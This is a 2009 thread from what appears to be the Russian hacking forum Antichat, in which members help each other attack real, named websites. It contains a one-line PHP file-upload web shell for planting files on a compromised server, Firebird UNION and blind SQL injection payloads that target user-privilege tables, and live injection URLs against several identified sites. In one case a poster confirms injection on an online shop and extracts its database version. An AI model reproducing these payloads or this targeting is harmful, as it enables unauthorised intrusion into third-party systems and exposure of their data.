 |
|
10.02.2009, 20:23
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами:
10227206
Репутация:
2163
|
|
downloader,
1. это nix? which wget GET curl lynx ? попробуй через аплоад:
<form enctype=multipart/form-data method=post><input type=file name=x><input type=submit></form><?$f=$_FILES[x];copy($f[tmp_name],$f[name]);?>
2. ковычка там не нужна и колонки в запросе две
Gorev, обе переменные участвуют в нескольких запросах поэтому связка с union там врятли прокатит, вообще говоря, т.к. колонка в одном из запросов одна выглядело бы примерно так -1+union+select+cast(user+as+char(n))+from+rdb$user _privileges/* причем тип данных (as char/int/etc(n)) должен совпадать с изначальным в первой выборке, если посимвольным брутом надо покапаться в мануалах найти функцию которая работает с выражениями/строками, особо не вдавался в этот вопрос
/add посмотрел пока писал сообщение посимвольно будет выглядеть примерно так:
+and+substring((select+rdb$user+from+rdb$user_priv ileges+здесь_какой_нибудь_подд ерживаемый_лимит(например rows))+from+1+for+0)='a'/*
все с точностью прочитанного нескольками минутами назад мануала, надо бы поставить, посмотреть может наврал где-то 
|
|
|
10.02.2009, 21:00
|
|
Reservists Of Antichat - Level 6
Регистрация: 04.02.2007
Сообщений: 1,152
С нами:
10139366
Репутация:
1502
|
|
Gorev, ну и ещё - тебе надо умудриться не только подобрать количество колонок в union, но и их типы) ибо из мануала
<...>Firebird is very strict with datatypes, and when you have different datatype in queries that make up the UNION it throws an error. It can happen even if difference is something trivial like CHAR(5) vs CHAR(6). It also happens for decimal and double datatypes, and (one of the most annoying) when you put NULL or zero.
Firebird 2 has much better type coercion as it detects the largest datatype, and allows smaller ones to fit automatically, i.e. if you have CHAR(5) in one query and CHAR(6) in other, it will automatically set view's column to be CHAR(6). Please note that datatypes have to be compatible for this to work (for example, you cannot union a Blob and Decimal column).
__________________
Bedankt euch dafür bei euch selbst.
H_2(S^3/((z1, z2)~(exp(2pi*i/p)z1, exp(2pi*q*i/p)z2)))=Z/pZ
|
|
|
|
10.02.2009, 22:13
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
http://www.np-ats.ru/index.jsp?pid=612'+order+by+1--
Такая же хня,скуля там есть.
|
|
|
|
10.02.2009, 22:31
|
|
Новичок
Регистрация: 12.09.2008
Сообщений: 13
С нами:
9295494
Репутация:
1
|
|
Сообщение от l1ght
downloader,
1. это nix? which wget GET curl lynx ? попробуй через аплоад:
Код:
<form enctype=multipart/form-data method=post><input type=file name=x><input type=submit></form><?$f=$_FILES[x];copy($f[tmp_name],$f[name]);?>
freeBSD 6.2
sorry но не понял как делать через аплоад  я ещё навичок в этом деле 
Последний раз редактировалось downloader; 10.02.2009 в 22:41..
|
|
|
|
10.02.2009, 23:18
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
С нами:
9147012
Репутация:
9
|
|
http://dl.kimep.kz/course/view.php?id=-114
Не могу найти скулю, помогите плз...
|
|
|
|
10.02.2009, 23:25
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами:
9741777
Репутация:
100
|
|
Включена фильтрация кавычек, вряд скули там будут.
|
|
|
|
10.02.2009, 23:45
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
С нами:
9147012
Репутация:
9
|
|
Сообщение от Ershik
Включена фильтрация кавычек, вряд скули там будут.
что можешь посоветовать?
|
|
|
|
11.02.2009, 05:30
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
С нами:
10254549
Репутация:
227
|
|
искать уязвимости. что ещё советовать-то?) Инъекции в ом параметре нет
|
|
|
|
11.02.2009, 05:50
|
|
Познающий
Регистрация: 21.01.2009
Сообщений: 98
С нами:
9107354
Репутация:
122
|
|
где тут вывод???
http://eromarket.com.ua/index.php?productID=-99999%20union%20select%20version()/*
|
|
|
|
11.02.2009, 06:07
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Забавная у тебя там инъекция, без минуса если:
Код:
http://eromarket.com.ua/index.php?productID=99999
Извините, запрашиваемый документ не был найден на сервере
Код:
http://eromarket.com.ua/index.php?categoryID=15+and+substring(version(),1,1)=5
5 ветка, похоже слепая, принтабельных колонок или в исходниках ничего не увидел
ан нет, именно в исходниках вывод и есть
5.0.45-log
Код:
http://eromarket.com.ua/index.php?categoryID=15+union+select+version()/*
<meta name="Description" content="Секс-шоп - EROmarket - Интернет-магазин, секс, sex, sex-shop, sexshop, интим,секс шоп, нижнее белье, эротические, эротические, белье, магазины, товары, духи, эро, bdsm, ero, эротика, возбудитель Разное Tongue Tingler Vibro E-Z Rider 5.0.45-log, Ukraine, Украина, Kiev, Киев">
80 таблиц. Успехов. File_priv нету
Последний раз редактировалось Pashkela; 11.02.2009 в 06:21..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
